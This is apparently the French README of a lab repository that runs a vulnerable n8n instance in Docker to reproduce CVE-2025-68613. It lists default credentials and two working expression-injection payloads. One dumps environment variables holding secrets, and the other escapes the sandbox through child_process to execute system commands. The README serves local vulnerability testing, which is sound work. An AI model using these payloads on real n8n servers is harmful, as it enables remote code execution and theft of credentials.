
Analyse de CVE-2025-68613
Ce dépôt fournit une configuration Docker Compose simple qui exécute une instance n8n vulnérable pour le test local de CVE-2025-68613.
Démarrer le conteneur :
docker compose up -d
Ouvrir n8n dans votre navigateur :
Se connecter avec les identifiants par défaut définis dans docker-compose.yml :
adminpassworddocker compose down
Cet environnement est destiné uniquement à des tests locaux et isolés. N'exposez pas cette instance sur l'internet public ou sur un réseau non fiable. Gardez-la sur un segment de réseau privé, local uniquement et séparé des systèmes de production. Utilisez-la à vos propres risques.
Une fois le conteneur en cours d'exécution, vous pouvez accéder à l'interface n8n à l'adresse http://localhost:5678. Pour tester la vulnérabilité, vous allez injecter une charge utile JavaScript malveillante dans un champ d'expression.
Étapes à reproduire :
Test 1 : Exfiltration de variables d'environnement Cette charge utile tente d'accéder aux variables d'environnement du processus, qui contiennent souvent des secrets.
{{ (function() { return this.process.env; })() }}

Test 2 : Exécution de code à distance (RCE) Cette charge utile tente de charger le module child_process pour exécuter des commandes système (par exemple, whoami).
{{ (function() {
var require = this.process.mainModule.require;
var execSync = require('child_process').execSync;
return execSync('whoami').toString();
})() }}

Résultat attendu : Si l'environnement est vulnérable, le panneau "Sortie" du nœud Set affichera le résultat de la commande (par exemple, root ou l'utilisateur n8n) ou un objet JSON contenant les variables d'environnement. Si l'instance était corrigée (par exemple, version 1.122.0+), le sandbox renverrait un objet vide ou une erreur.